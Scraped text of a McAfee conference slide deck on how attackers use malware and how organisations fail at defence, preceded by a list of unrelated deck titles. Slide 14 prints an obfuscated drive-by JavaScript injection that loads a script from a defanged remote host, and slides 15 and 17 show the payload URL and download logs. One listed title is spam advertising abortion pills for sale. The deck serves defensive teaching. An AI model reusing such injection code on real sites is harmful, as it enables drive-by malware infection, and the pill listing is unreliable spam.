🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘🐬 The future of MySQL is Postgres 🐘
🐬 The future of MySQL is Postgres 🐘
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FMECloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live StreamsTop 5 Benefits OF Using Muvi Live Paywall For Live Streams
Top 5 Benefits OF Using Muvi Live Paywall For Live Streams
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 

Offensive malware usage and defense

  • 1. Malware Offensive usage and how to defend Christiaan Beek McAfee Professional Services
  • 2. Agenda • $whoami • Examples • Offensive ways of using malware • What goes wrong • Defense recommendations • Final thoughts
  • 3. > whoami • Christiaan Beek • Practice lead IR & Forensics EMEA • Developer/Instructor MFIRE • Training CERTS
  • 4. A Little Background Foundstone Services – McAfee Strategic Security
  • 6. Offensive usage of malware ENERGY & INFRA Financial MEDICAL MOBILE Defense
  • 7. Offensive usage of malware Why malware? • low profile during preparation • many options to spread / infect • many ways to hide • self destruct mechanism • many ways to transfer data to
  • 8. Offensive usage of malware • More and more discovery of malware frameworks • Multiple modules /components • Written by pro’s – sponsored by nations
  • 9. Offensive - What’s Different? Development Delivery Detection Command & Control Intent • Nation-States • Zero day • Digitally signed • Central • Surveillance propagation with command • Truly compromised • Disrupt / customized • Multi-vectored: certificates • Modular Destroy payloads Blue tooth, payloads USB, network • Outbound ex- filtration masking
  • 10. Stages of an attack:
  • 11. Stages of an attack:
  • 12. Stages of an attack:
  • 13. Stages of an attack:
  • 14. Stages of an attack – first script script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script type="text/javascript"> if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 && hiOC2.indexOf("spider")==-1) var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+1*60*60*1000); document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString(); for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 && (navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length- 1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 = eval;}CwefLf0=“S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e) } </script> <DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript" src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>
  • 15. Final destination?: hxxp://222.7x.xx.xx.xx/x.exe
  • 17. IIS logs on hacked ‘landing’ server: 9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe 9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe Dial 80 Or 443
  • 19. Future usage of malware
  • 28. What goes wrong regarding Defense? An Intel company
  • 29. Problem #1 An Intel company Many solutions but how to use them? Forensic Readiness?
  • 30. Problem #2 An Intel company No visibility on the network No correlation of events
  • 31. Problem #3 An Intel company Lack of skilled, experienced and dedicated people
  • 32. Problem #4 An Intel company No Incident Response procedures No Dry-run exercise
  • 33. Problem #5 An Intel company The attack came from…..
  • 34. Problem #6 An Intel company Destroying evidence
  • 35. Problem #7 An Intel company who is the system owner? who will take action? who is allowed to take decisions?
  • 37. The Big “Threat” Picture Threats Threats All Threats All Known Core AntiVirus AntiVirus Threats Sees Protects
  • 38. The “Core” Security Problem • “Unauthorized” Execution End Users = Data – Payload/attachment/link – Network Identity Thieves Spammers – Privilege Bot Herder • “Authorized” Execution – Insiders misuse of privilege Vulnerability Tool Discoverers Developers 100101010010110 Malware Developers
  • 41. Final thoughts...... An Intel company - Incidents happen - Is forensic & malware readiness on your agenda? - What needs to be changed in your process? - Is your {army-unit/company/agency/etc} prepared? - Did you separate critical infrastructures? - Can we help you?
  • 42. Thank you! An Intel company Keep in touch: Email: Christiaan_Beek@McAfee dot com Twitter: @FSEMEA @Foundstone @ChristaanBeek